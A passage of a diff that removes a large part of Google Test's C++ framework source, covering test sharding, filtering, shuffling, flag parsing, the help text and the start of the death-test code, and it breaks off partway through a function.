-                    TearDownEnvironment);
-      repeater->OnEnvironmentsTearDownEnd(*parent_);
-    }
-
-    elapsed_time_ = GetTimeInMillis() - start;
-
-    // Tells the unit test event listener that the tests have just finished.
-    repeater->OnTestIterationEnd(*parent_, i);
-
-    // Gets the result and clears it.
-    if (!Passed()) {
-      failed = true;
-    }
-
-    // Restores the original test order after the iteration.  This
-    // allows the user to quickly repro a failure that happens in the
-    // N-th iteration without repeating the first (N - 1) iterations.
-    // This is not enclosed in "if (GTEST_FLAG(shuffle)) { ... }", in
-    // case the user somehow changes the value of the flag somewhere
-    // (it's always safe to unshuffle the tests).
-    UnshuffleTests();
-
-    if (GTEST_FLAG(shuffle)) {
-      // Picks a new random seed for each iteration.
-      random_seed_ = GetNextRandomSeed(random_seed_);
-    }
-  }
-
-  repeater->OnTestProgramEnd(*parent_);
-
-  return !failed;
-}
-
-// Reads the GTEST_SHARD_STATUS_FILE environment variable, and creates the file
-// if the variable is present. If a file already exists at this location, this
-// function will write over it. If the variable is present, but the file cannot
-// be created, prints an error and exits.
-void WriteToShardStatusFileIfNeeded() {
-  const char* const test_shard_file = posix::GetEnv(kTestShardStatusFile);
-  if (test_shard_file != NULL) {
-    FILE* const file = posix::FOpen(test_shard_file, "w");
-    if (file == NULL) {
-      ColoredPrintf(COLOR_RED,
-                    "Could not write to the test shard status file \"%s\" "
-                    "specified by the %s environment variable.\n",
-                    test_shard_file, kTestShardStatusFile);
-      fflush(stdout);
-      exit(EXIT_FAILURE);
-    }
-    fclose(file);
-  }
-}
-
-// Checks whether sharding is enabled by examining the relevant
-// environment variable values. If the variables are present,
-// but inconsistent (i.e., shard_index >= total_shards), prints
-// an error and exits. If in_subprocess_for_death_test, sharding is
-// disabled because it must only be applied to the original test
-// process. Otherwise, we could filter out death tests we intended to execute.
-bool ShouldShard(const char* total_shards_env,
-                 const char* shard_index_env,
-                 bool in_subprocess_for_death_test) {
-  if (in_subprocess_for_death_test) {
-    return false;
-  }
-
-  const Int32 total_shards = Int32FromEnvOrDie(total_shards_env, -1);
-  const Int32 shard_index = Int32FromEnvOrDie(shard_index_env, -1);
-
-  if (total_shards == -1 && shard_index == -1) {
-    return false;
-  } else if (total_shards == -1 && shard_index != -1) {
-    const Message msg = Message()
-      << "Invalid environment variables: you have "
-      << kTestShardIndex << " = " << shard_index
-      << ", but have left " << kTestTotalShards << " unset.\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  } else if (total_shards != -1 && shard_index == -1) {
-    const Message msg = Message()
-      << "Invalid environment variables: you have "
-      << kTestTotalShards << " = " << total_shards
-      << ", but have left " << kTestShardIndex << " unset.\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  } else if (shard_index < 0 || shard_index >= total_shards) {
-    const Message msg = Message()
-      << "Invalid environment variables: we require 0 <= "
-      << kTestShardIndex << " < " << kTestTotalShards
-      << ", but you have " << kTestShardIndex << "=" << shard_index
-      << ", " << kTestTotalShards << "=" << total_shards << ".\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  }
-
-  return total_shards > 1;
-}
-
-// Parses the environment variable var as an Int32. If it is unset,
-// returns default_val. If it is not an Int32, prints an error
-// and aborts.
-Int32 Int32FromEnvOrDie(const char* var, Int32 default_val) {
-  const char* str_val = posix::GetEnv(var);
-  if (str_val == NULL) {
-    return default_val;
-  }
-
-  Int32 result;
-  if (!ParseInt32(Message() << "The value of environment variable " << var,
-                  str_val, &result)) {
-    exit(EXIT_FAILURE);
-  }
-  return result;
-}
-
-// Given the total number of shards, the shard index, and the test id,
-// returns true iff the test should be run on this shard. The test id is
-// some arbitrary but unique non-negative integer assigned to each test
-// method. Assumes that 0 <= shard_index < total_shards.
-bool ShouldRunTestOnShard(int total_shards, int shard_index, int test_id) {
-  return (test_id % total_shards) == shard_index;
-}
-
-// Compares the name of each test with the user-specified filter to
-// decide whether the test should be run, then records the result in
-// each TestCase and TestInfo object.
-// If shard_tests == true, further filters tests based on sharding
-// variables in the environment - see
-// http://code.google.com/p/googletest/wiki/GoogleTestAdvancedGuide.
-// Returns the number of tests that should run.
-int UnitTestImpl::FilterTests(ReactionToSharding shard_tests) {
-  const Int32 total_shards = shard_tests == HONOR_SHARDING_PROTOCOL ?
-      Int32FromEnvOrDie(kTestTotalShards, -1) : -1;
-  const Int32 shard_index = shard_tests == HONOR_SHARDING_PROTOCOL ?
-      Int32FromEnvOrDie(kTestShardIndex, -1) : -1;
-
-  // num_runnable_tests are the number of tests that will
-  // run across all shards (i.e., match filter and are not disabled).
-  // num_selected_tests are the number of tests to be run on
-  // this shard.
-  int num_runnable_tests = 0;
-  int num_selected_tests = 0;
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    TestCase* const test_case = test_cases_[i];
-    const std::string &test_case_name = test_case->name();
-    test_case->set_should_run(false);
-
-    for (size_t j = 0; j < test_case->test_info_list().size(); j++) {
-      TestInfo* const test_info = test_case->test_info_list()[j];
-      const std::string test_name(test_info->name());
-      // A test is disabled if test case name or test name matches
-      // kDisableTestFilter.
-      const bool is_disabled =
-          internal::UnitTestOptions::MatchesFilter(test_case_name,
-                                                   kDisableTestFilter) ||
-          internal::UnitTestOptions::MatchesFilter(test_name,
-                                                   kDisableTestFilter);
-      test_info->is_disabled_ = is_disabled;
-
-      const bool matches_filter =
-          internal::UnitTestOptions::FilterMatchesTest(test_case_name,
-                                                       test_name);
-      test_info->matches_filter_ = matches_filter;
-
-      const bool is_runnable =
-          (GTEST_FLAG(also_run_disabled_tests) || !is_disabled) &&
-          matches_filter;
-
-      const bool is_selected = is_runnable &&
-          (shard_tests == IGNORE_SHARDING_PROTOCOL ||
-           ShouldRunTestOnShard(total_shards, shard_index,
-                                num_runnable_tests));
-
-      num_runnable_tests += is_runnable;
-      num_selected_tests += is_selected;
-
-      test_info->should_run_ = is_selected;
-      test_case->set_should_run(test_case->should_run() || is_selected);
-    }
-  }
-  return num_selected_tests;
-}
-
-// Prints the given C-string on a single line by replacing all '\n'
-// characters with string "\\n".  If the output takes more than
-// max_length characters, only prints the first max_length characters
-// and "...".
-static void PrintOnOneLine(const char* str, int max_length) {
-  if (str != NULL) {
-    for (int i = 0; *str != '\0'; ++str) {
-      if (i >= max_length) {
-        printf("...");
-        break;
-      }
-      if (*str == '\n') {
-        printf("\\n");
-        i += 2;
-      } else {
-        printf("%c", *str);
-        ++i;
-      }
-    }
-  }
-}
-
-// Prints the names of the tests matching the user-specified filter flag.
-void UnitTestImpl::ListTestsMatchingFilter() {
-  // Print at most this many characters for each type/value parameter.
-  const int kMaxParamLength = 250;
-
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    const TestCase* const test_case = test_cases_[i];
-    bool printed_test_case_name = false;
-
-    for (size_t j = 0; j < test_case->test_info_list().size(); j++) {
-      const TestInfo* const test_info =
-          test_case->test_info_list()[j];
-      if (test_info->matches_filter_) {
-        if (!printed_test_case_name) {
-          printed_test_case_name = true;
-          printf("%s.", test_case->name());
-          if (test_case->type_param() != NULL) {
-            printf("  # %s = ", kTypeParamLabel);
-            // We print the type parameter on a single line to make
-            // the output easy to parse by a program.
-            PrintOnOneLine(test_case->type_param(), kMaxParamLength);
-          }
-          printf("\n");
-        }
-        printf("  %s", test_info->name());
-        if (test_info->value_param() != NULL) {
-          printf("  # %s = ", kValueParamLabel);
-          // We print the value parameter on a single line to make the
-          // output easy to parse by a program.
-          PrintOnOneLine(test_info->value_param(), kMaxParamLength);
-        }
-        printf("\n");
-      }
-    }
-  }
-  fflush(stdout);
-}
-
-// Sets the OS stack trace getter.
-//
-// Does nothing if the input and the current OS stack trace getter are
-// the same; otherwise, deletes the old getter and makes the input the
-// current getter.
-void UnitTestImpl::set_os_stack_trace_getter(
-    OsStackTraceGetterInterface* getter) {
-  if (os_stack_trace_getter_ != getter) {
-    delete os_stack_trace_getter_;
-    os_stack_trace_getter_ = getter;
-  }
-}
-
-// Returns the current OS stack trace getter if it is not NULL;
-// otherwise, creates an OsStackTraceGetter, makes it the current
-// getter, and returns it.
-OsStackTraceGetterInterface* UnitTestImpl::os_stack_trace_getter() {
-  if (os_stack_trace_getter_ == NULL) {
-    os_stack_trace_getter_ = new OsStackTraceGetter;
-  }
-
-  return os_stack_trace_getter_;
-}
-
-// Returns the TestResult for the test that's currently running, or
-// the TestResult for the ad hoc test if no test is running.
-TestResult* UnitTestImpl::current_test_result() {
-  return current_test_info_ ?
-      &(current_test_info_->result_) : &ad_hoc_test_result_;
-}
-
-// Shuffles all test cases, and the tests within each test case,
-// making sure that death tests are still run first.
-void UnitTestImpl::ShuffleTests() {
-  // Shuffles the death test cases.
-  ShuffleRange(random(), 0, last_death_test_case_ + 1, &test_case_indices_);
-
-  // Shuffles the non-death test cases.
-  ShuffleRange(random(), last_death_test_case_ + 1,
-               static_cast<int>(test_cases_.size()), &test_case_indices_);
-
-  // Shuffles the tests inside each test case.
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    test_cases_[i]->ShuffleTests(random());
-  }
-}
-
-// Restores the test cases and tests to their order before the first shuffle.
-void UnitTestImpl::UnshuffleTests() {
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    // Unshuffles the tests in each test case.
-    test_cases_[i]->UnshuffleTests();
-    // Resets the index of each test case.
-    test_case_indices_[i] = static_cast<int>(i);
-  }
-}
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// GetCurrentOsStackTraceExceptTop(..., 1), Foo() will be included in
-// the trace but Bar() and GetCurrentOsStackTraceExceptTop() won't.
-std::string GetCurrentOsStackTraceExceptTop(UnitTest* /*unit_test*/,
-                                            int skip_count) {
-  // We pass skip_count + 1 to skip this wrapper function in addition
-  // to what the user really wants to skip.
-  return GetUnitTestImpl()->CurrentOsStackTraceExceptTop(skip_count + 1);
-}
-
-// Used by the GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_ macro to
-// suppress unreachable code warnings.
-namespace {
-class ClassUniqueToAlwaysTrue {};
-}
-
-bool IsTrue(bool condition) { return condition; }
-
-bool AlwaysTrue() {
-#if GTEST_HAS_EXCEPTIONS
-  // This condition is always false so AlwaysTrue() never actually throws,
-  // but it makes the compiler think that it may throw.
-  if (IsTrue(false))
-    throw ClassUniqueToAlwaysTrue();
-#endif  // GTEST_HAS_EXCEPTIONS
-  return true;
-}
-
-// If *pstr starts with the given prefix, modifies *pstr to be right
-// past the prefix and returns true; otherwise leaves *pstr unchanged
-// and returns false.  None of pstr, *pstr, and prefix can be NULL.
-bool SkipPrefix(const char* prefix, const char** pstr) {
-  const size_t prefix_len = strlen(prefix);
-  if (strncmp(*pstr, prefix, prefix_len) == 0) {
-    *pstr += prefix_len;
-    return true;
-  }
-  return false;
-}
-
-// Parses a string as a command line flag.  The string should have
-// the format "--flag=value".  When def_optional is true, the "=value"
-// part can be omitted.
-//
-// Returns the value of the flag, or NULL if the parsing failed.
-const char* ParseFlagValue(const char* str,
-                           const char* flag,
-                           bool def_optional) {
-  // str and flag must not be NULL.
-  if (str == NULL || flag == NULL) return NULL;
-
-  // The flag must start with "--" followed by GTEST_FLAG_PREFIX_.
-  const std::string flag_str = std::string("--") + GTEST_FLAG_PREFIX_ + flag;
-  const size_t flag_len = flag_str.length();
-  if (strncmp(str, flag_str.c_str(), flag_len) != 0) return NULL;
-
-  // Skips the flag name.
-  const char* flag_end = str + flag_len;
-
-  // When def_optional is true, it's OK to not have a "=value" part.
-  if (def_optional && (flag_end[0] == '\0')) {
-    return flag_end;
-  }
-
-  // If def_optional is true and there are more characters after the
-  // flag name, or if def_optional is false, there must be a '=' after
-  // the flag name.
-  if (flag_end[0] != '=') return NULL;
-
-  // Returns the string after "=".
-  return flag_end + 1;
-}
-
-// Parses a string for a bool flag, in the form of either
-// "--flag=value" or "--flag".
-//
-// In the former case, the value is taken as true as long as it does
-// not start with '0', 'f', or 'F'.
-//
-// In the latter case, the value is taken as true.
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseBoolFlag(const char* str, const char* flag, bool* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, true);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Converts the string value to a bool.
-  *value = !(*value_str == '0' || *value_str == 'f' || *value_str == 'F');
-  return true;
-}
-
-// Parses a string for an Int32 flag, in the form of
-// "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseInt32Flag(const char* str, const char* flag, Int32* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, false);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Sets *value to the value of the flag.
-  return ParseInt32(Message() << "The value of flag --" << flag,
-                    value_str, value);
-}
-
-// Parses a string for a string flag, in the form of
-// "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseStringFlag(const char* str, const char* flag, std::string* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, false);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Sets *value to the value of the flag.
-  *value = value_str;
-  return true;
-}
-
-// Determines whether a string has a prefix that Google Test uses for its
-// flags, i.e., starts with GTEST_FLAG_PREFIX_ or GTEST_FLAG_PREFIX_DASH_.
-// If Google Test detects that a command line flag has its prefix but is not
-// recognized, it will print its help message. Flags starting with
-// GTEST_INTERNAL_PREFIX_ followed by "internal_" are considered Google Test
-// internal flags and do not trigger the help message.
-static bool HasGoogleTestFlagPrefix(const char* str) {
-  return (SkipPrefix("--", &str) ||
-          SkipPrefix("-", &str) ||
-          SkipPrefix("/", &str)) &&
-         !SkipPrefix(GTEST_FLAG_PREFIX_ "internal_", &str) &&
-         (SkipPrefix(GTEST_FLAG_PREFIX_, &str) ||
-          SkipPrefix(GTEST_FLAG_PREFIX_DASH_, &str));
-}
-
-// Prints a string containing code-encoded text.  The following escape
-// sequences can be used in the string to control the text color:
-//
-//   @@    prints a single '@' character.
-//   @R    changes the color to red.
-//   @G    changes the color to green.
-//   @Y    changes the color to yellow.
-//   @D    changes to the default terminal text color.
-//
-// TODO(wan@google.com): Write tests for this once we add stdout
-// capturing to Google Test.
-static void PrintColorEncoded(const char* str) {
-  GTestColor color = COLOR_DEFAULT;  // The current color.
-
-  // Conceptually, we split the string into segments divided by escape
-  // sequences.  Then we print one segment at a time.  At the end of
-  // each iteration, the str pointer advances to the beginning of the
-  // next segment.
-  for (;;) {
-    const char* p = strchr(str, '@');
-    if (p == NULL) {
-      ColoredPrintf(color, "%s", str);
-      return;
-    }
-
-    ColoredPrintf(color, "%s", std::string(str, p).c_str());
-
-    const char ch = p[1];
-    str = p + 2;
-    if (ch == '@') {
-      ColoredPrintf(color, "@");
-    } else if (ch == 'D') {
-      color = COLOR_DEFAULT;
-    } else if (ch == 'R') {
-      color = COLOR_RED;
-    } else if (ch == 'G') {
-      color = COLOR_GREEN;
-    } else if (ch == 'Y') {
-      color = COLOR_YELLOW;
-    } else {
-      --str;
-    }
-  }
-}
-
-static const char kColorEncodedHelpMessage[] =
-"This program contains tests written using " GTEST_NAME_ ". You can use the\n"
-"following command line flags to control its behavior:\n"
-"\n"
-"Test Selection:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "list_tests@D\n"
-"      List the names of all tests instead of running them. The name of\n"
-"      TEST(Foo, Bar) is \"Foo.Bar\".\n"
-"  @G--" GTEST_FLAG_PREFIX_ "filter=@YPOSTIVE_PATTERNS"
-    "[@G-@YNEGATIVE_PATTERNS]@D\n"
-"      Run only the tests whose name matches one of the positive patterns but\n"
-"      none of the negative patterns. '?' matches any single character; '*'\n"
-"      matches any substring; ':' separates two patterns.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "also_run_disabled_tests@D\n"
-"      Run all disabled tests too.\n"
-"\n"
-"Test Execution:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "repeat=@Y[COUNT]@D\n"
-"      Run the tests repeatedly; use a negative count to repeat forever.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "shuffle@D\n"
-"      Randomize tests' orders on every iteration.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "random_seed=@Y[NUMBER]@D\n"
-"      Random number seed to use for shuffling test orders (between 1 and\n"
-"      99999, or 0 to use a seed based on the current time).\n"
-"\n"
-"Test Output:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "color=@Y(@Gyes@Y|@Gno@Y|@Gauto@Y)@D\n"
-"      Enable/disable colored output. The default is @Gauto@D.\n"
-"  -@G-" GTEST_FLAG_PREFIX_ "print_time=0@D\n"
-"      Don't print the elapsed time of each test.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "output=xml@Y[@G:@YDIRECTORY_PATH@G"
-    GTEST_PATH_SEP_ "@Y|@G:@YFILE_PATH]@D\n"
-"      Generate an XML report in the given directory or with the given file\n"
-"      name. @YFILE_PATH@D defaults to @Gtest_details.xml@D.\n"
-#if GTEST_CAN_STREAM_RESULTS_
-"  @G--" GTEST_FLAG_PREFIX_ "stream_result_to=@YHOST@G:@YPORT@D\n"
-"      Stream test results to the given server.\n"
-#endif  // GTEST_CAN_STREAM_RESULTS_
-"\n"
-"Assertion Behavior:\n"
-#if GTEST_HAS_DEATH_TEST && !GTEST_OS_WINDOWS
-"  @G--" GTEST_FLAG_PREFIX_ "death_test_style=@Y(@Gfast@Y|@Gthreadsafe@Y)@D\n"
-"      Set the default death test style.\n"
-#endif  // GTEST_HAS_DEATH_TEST && !GTEST_OS_WINDOWS
-"  @G--" GTEST_FLAG_PREFIX_ "break_on_failure@D\n"
-"      Turn assertion failures into debugger break-points.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "throw_on_failure@D\n"
-"      Turn assertion failures into C++ exceptions.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "catch_exceptions=0@D\n"
-"      Do not report exceptions as test failures. Instead, allow them\n"
-"      to crash the program or throw a pop-up (on Windows).\n"
-"\n"
-"Except for @G--" GTEST_FLAG_PREFIX_ "list_tests@D, you can alternatively set "
-    "the corresponding\n"
-"environment variable of a flag (all letters in upper-case). For example, to\n"
-"disable colored text output, you can either specify @G--" GTEST_FLAG_PREFIX_
-    "color=no@D or set\n"
-"the @G" GTEST_FLAG_PREFIX_UPPER_ "COLOR@D environment variable to @Gno@D.\n"
-"\n"
-"For more information, please read the " GTEST_NAME_ " documentation at\n"
-"@G" GTEST_PROJECT_URL_ "@D. If you find a bug in " GTEST_NAME_ "\n"
-"(not one in your own code or tests), please report it to\n"
-"@G<" GTEST_DEV_EMAIL_ ">@D.\n";
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.  The type parameter CharType can be
-// instantiated to either char or wchar_t.
-template <typename CharType>
-void ParseGoogleTestFlagsOnlyImpl(int* argc, CharType** argv) {
-  for (int i = 1; i < *argc; i++) {
-    const std::string arg_string = StreamableToString(argv[i]);
-    const char* const arg = arg_string.c_str();
-
-    using internal::ParseBoolFlag;
-    using internal::ParseInt32Flag;
-    using internal::ParseStringFlag;
-
-    // Do we see a Google Test flag?
-    if (ParseBoolFlag(arg, kAlsoRunDisabledTestsFlag,
-                      &GTEST_FLAG(also_run_disabled_tests)) ||
-        ParseBoolFlag(arg, kBreakOnFailureFlag,
-                      &GTEST_FLAG(break_on_failure)) ||
-        ParseBoolFlag(arg, kCatchExceptionsFlag,
-                      &GTEST_FLAG(catch_exceptions)) ||
-        ParseStringFlag(arg, kColorFlag, &GTEST_FLAG(color)) ||
-        ParseStringFlag(arg, kDeathTestStyleFlag,
-                        &GTEST_FLAG(death_test_style)) ||
-        ParseBoolFlag(arg, kDeathTestUseFork,
-                      &GTEST_FLAG(death_test_use_fork)) ||
-        ParseStringFlag(arg, kFilterFlag, &GTEST_FLAG(filter)) ||
-        ParseStringFlag(arg, kInternalRunDeathTestFlag,
-                        &GTEST_FLAG(internal_run_death_test)) ||
-        ParseBoolFlag(arg, kListTestsFlag, &GTEST_FLAG(list_tests)) ||
-        ParseStringFlag(arg, kOutputFlag, &GTEST_FLAG(output)) ||
-        ParseBoolFlag(arg, kPrintTimeFlag, &GTEST_FLAG(print_time)) ||
-        ParseInt32Flag(arg, kRandomSeedFlag, &GTEST_FLAG(random_seed)) ||
-        ParseInt32Flag(arg, kRepeatFlag, &GTEST_FLAG(repeat)) ||
-        ParseBoolFlag(arg, kShuffleFlag, &GTEST_FLAG(shuffle)) ||
-        ParseInt32Flag(arg, kStackTraceDepthFlag,
-                       &GTEST_FLAG(stack_trace_depth)) ||
-        ParseStringFlag(arg, kStreamResultToFlag,
-                        &GTEST_FLAG(stream_result_to)) ||
-        ParseBoolFlag(arg, kThrowOnFailureFlag,
-                      &GTEST_FLAG(throw_on_failure))
-        ) {
-      // Yes.  Shift the remainder of the argv list left by one.  Note
-      // that argv has (*argc + 1) elements, the last one always being
-      // NULL.  The following loop moves the trailing NULL element as
-      // well.
-      for (int j = i; j != *argc; j++) {
-        argv[j] = argv[j + 1];
-      }
-
-      // Decrements the argument count.
-      (*argc)--;
-
-      // We also need to decrement the iterator as we just removed
-      // an element.
-      i--;
-    } else if (arg_string == "--help" || arg_string == "-h" ||
-               arg_string == "-?" || arg_string == "/?" ||
-               HasGoogleTestFlagPrefix(arg)) {
-      // Both help flag and unrecognized Google Test flags (excluding
-      // internal ones) trigger help display.
-      g_help_flag = true;
-    }
-  }
-
-  if (g_help_flag) {
-    // We print the help here instead of in RUN_ALL_TESTS(), as the
-    // latter may not be called at all if the user is using Google
-    // Test with another testing framework.
-    PrintColorEncoded(kColorEncodedHelpMessage);
-  }
-}
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.
-void ParseGoogleTestFlagsOnly(int* argc, char** argv) {
-  ParseGoogleTestFlagsOnlyImpl(argc, argv);
-}
-void ParseGoogleTestFlagsOnly(int* argc, wchar_t** argv) {
-  ParseGoogleTestFlagsOnlyImpl(argc, argv);
-}
-
-// The internal implementation of InitGoogleTest().
-//
-// The type parameter CharType can be instantiated to either char or
-// wchar_t.
-template <typename CharType>
-void InitGoogleTestImpl(int* argc, CharType** argv) {
-  g_init_gtest_count++;
-
-  // We don't want to run the initialization code twice.
-  if (g_init_gtest_count != 1) return;
-
-  if (*argc <= 0) return;
-
-  internal::g_executable_path = internal::StreamableToString(argv[0]);
-
-#if GTEST_HAS_DEATH_TEST
-
-  g_argvs.clear();
-  for (int i = 0; i != *argc; i++) {
-    g_argvs.push_back(StreamableToString(argv[i]));
-  }
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-  ParseGoogleTestFlagsOnly(argc, argv);
-  GetUnitTestImpl()->PostFlagParsingInit();
-}
-
-}  // namespace internal
-
-// Initializes Google Test.  This must be called before calling
-// RUN_ALL_TESTS().  In particular, it parses a command line for the
-// flags that Google Test recognizes.  Whenever a Google Test flag is
-// seen, it is removed from argv, and *argc is decremented.
-//
-// No value is returned.  Instead, the Google Test flag variables are
-// updated.
-//
-// Calling the function for the second time has no user-visible effect.
-void InitGoogleTest(int* argc, char** argv) {
-  internal::InitGoogleTestImpl(argc, argv);
-}
-
-// This overloaded version can be used in Windows programs compiled in
-// UNICODE mode.
-void InitGoogleTest(int* argc, wchar_t** argv) {
-  internal::InitGoogleTestImpl(argc, argv);
-}
-
-}  // namespace testing
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan), vladl@google.com (Vlad Losev)
-//
-// This file implements death tests.
-
-
-#if GTEST_HAS_DEATH_TEST
-
-# if GTEST_OS_MAC
-#  include <crt_externs.h>
-# endif  // GTEST_OS_MAC
-
-# include <errno.h>
-# include <fcntl.h>
-# include <limits.h>
-
-# if GTEST_OS_LINUX
-#  include <signal.h>
-# endif  // GTEST_OS_LINUX
-
-# include <stdarg.h>
-
-# if GTEST_OS_WINDOWS
-#  include <windows.h>
-# else
-#  include <sys/mman.h>
-#  include <sys/wait.h>
-# endif  // GTEST_OS_WINDOWS
-
-# if GTEST_OS_QNX
-#  include <spawn.h>
-# endif  // GTEST_OS_QNX
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-
-// Constants.
-
-// The default death test style.
-static const char kDefaultDeathTestStyle[] = "fast";
-
-GTEST_DEFINE_string_(
-    death_test_style,
-    internal::StringFromGTestEnv("death_test_style", kDefaultDeathTestStyle),
-    "Indicates how to run a death test in a forked child process: "
-    "\"threadsafe\" (child process re-executes the test binary "
-    "from the beginning, running only the specific death test) or "
-    "\"fast\" (child process runs the death test immediately "
-    "after forking).");
-
-GTEST_DEFINE_bool_(
-    death_test_use_fork,
-    internal::BoolFromGTestEnv("death_test_use_fork", false),
-    "Instructs to use fork()/_exit() instead of clone() in death tests. "
-    "Ignored and always uses fork() on POSIX systems where clone() is not "
-    "implemented. Useful when running under valgrind or similar tools if "
-    "those do not support clone(). Valgrind 3.3.1 will just fail if "
-    "it sees an unsupported combination of clone() flags. "
-    "It is not recommended to use this flag w/o valgrind though it will "
-    "work in 99% of the cases. Once valgrind is fixed, this flag will "
-    "most likely be removed.");
-
-namespace internal {
-GTEST_DEFINE_string_(
-    internal_run_death_test, "",
-    "Indicates the file, line number, temporal index of "
-    "the single death test to run, and a file descriptor to "
-    "which a success code may be sent, all separated by "
-    "the '|' characters.  This flag is specified if and only if the current "
-    "process is a sub-process launched for running a thread-safe "
-    "death test.  FOR INTERNAL USE ONLY.");
-}  // namespace internal
-
-#if GTEST_HAS_DEATH_TEST
-
-namespace internal {
-
-// Valid only for fast death tests. Indicates the code is running in the
-// child process of a fast style death test.
-static bool g_in_fast_death_test_child = false;
-
-// Returns a Boolean value indicating whether the caller is currently
-// executing in the context of the death test child process.  Tools such as
-// Valgrind heap checkers may need this to modify their behavior in death
-// tests.  IMPORTANT: This is an internal utility.  Using it may break the
-// implementation of death tests.  User code MUST NOT use it.
-bool InDeathTestChild() {
-# if GTEST_OS_WINDOWS
-
-  // On Windows, death tests are thread-safe regardless of the value of the
-  // death_test_style flag.
-  return !GTEST_FLAG(internal_run_death_test).empty();
-
-# else
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe")
-    return !GTEST_FLAG(internal_run_death_test).empty();
-  else
-    return g_in_fast_death_test_child;
-#endif
-}
-
-}  // namespace internal
-
-// ExitedWithCode constructor.
-ExitedWithCode::ExitedWithCode(int exit_code) : exit_code_(exit_code) {
-}
-
-// ExitedWithCode function-call operator.
-bool ExitedWithCode::operator()(int exit_status) const {
-# if GTEST_OS_WINDOWS
-
-  return exit_status == exit_code_;
-
-# else
-
-  return WIFEXITED(exit_status) && WEXITSTATUS(exit_status) == exit_code_;
-
-# endif  // GTEST_OS_WINDOWS
-}
-
-# if !GTEST_OS_WINDOWS
-// KilledBySignal constructor.
-KilledBySignal::KilledBySignal(int signum) : signum_(signum) {
-}
-
-// KilledBySignal function-call operator.
-bool KilledBySignal::operator()(int exit_status) const {
-  return WIFSIGNALED(exit_status) && WTERMSIG(exit_status) == signum_;
-}
-# endif  // !GTEST_OS_WINDOWS
-
-namespace internal {
-
-// Utilities needed for death tests.
-
-// Generates a textual description of a given exit code, in the format
-// specified by wait(2).
-static std::string ExitSummary(int exit_code) {
-  Message m;
-
-# if GTEST_OS_WINDOWS
-
-  m << "Exited with exit status " << exit_code;
-
-# else
-
-  if (WIFEXITED(exit_code)) {
-    m << "Exited with exit status " << WEXITSTATUS(exit_code);
